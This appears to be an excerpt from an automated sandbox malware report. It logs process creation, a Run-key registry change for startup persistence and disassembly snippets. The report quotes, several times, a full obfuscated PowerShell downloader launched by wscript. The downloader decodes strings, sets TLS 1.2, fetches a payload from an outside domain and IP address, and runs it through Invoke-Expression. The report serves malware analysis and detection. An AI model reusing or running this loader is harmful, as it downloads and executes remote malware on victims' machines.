(toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8809AD push E85E535Dh; ret	1_2_00007FFD9B8809F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B955479 push ebp; iretd	1_2_00007FFD9B955538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0454EC78 pushfd ; retf	4_2_0454EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_045436D9 push ebx; iretd	4_2_045436DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073D1D28 push eax; mov dword ptr [esp], ecx	4_2_073D21B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073DA555 push esp; retf	4_2_073DA559
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073D219E push eax; mov dword ptr [esp], ecx	4_2_073D21B4

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
